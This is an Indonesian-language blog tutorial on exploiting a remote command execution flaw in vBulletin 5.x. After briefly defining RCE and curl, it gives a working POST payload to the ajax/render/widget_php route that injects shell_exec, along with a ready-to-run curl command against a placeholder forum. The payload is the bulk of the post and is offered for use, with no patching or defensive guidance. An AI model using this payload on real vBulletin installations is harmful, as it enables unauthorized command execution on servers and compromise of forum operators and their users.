Home Exploit vBulletin 5.x - Remote Command Execution With Curl

vBulletin 5.x - Remote Command Execution With Curl

10/15/2019 Add Comment Edit
vBulletin 5.x - Remote Command Execution With Curl, Sebelum ketahap berikutnya kita jelaskan dulu apa itu Remote Command Execution (RCE) & Apa itu Curl. Remote Command Execution (RCE)atau Remote Arbitary Command Execution (ACE) adalah bug yg memungkinkan attacker untuk menjalankan command2 secara remote melalui url & Curl adalah sebuah program dan library untuk mengirim dan mengambil data melalui URL.

[+] Full Path : https://forum.target.com/
[+] Post Data : "routestring=ajax/render/widget_php&widgetConfig[code]=echo shell_exec('uname -a');"

Disini Kita Exectionnya via curl.

contoh command : 
curl -s "https://forum.target.com/" --data  "routestring=ajax/render/widget_php&widgetConfig[code]=echo shell_exec('uname -a');"
inilah hasil dari execution di atas terlihat sebuah karnel. 

Sekian Tutorial Dari Saya.
Nako48

0 Response to "vBulletin 5.x - Remote Command Execution With Curl"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel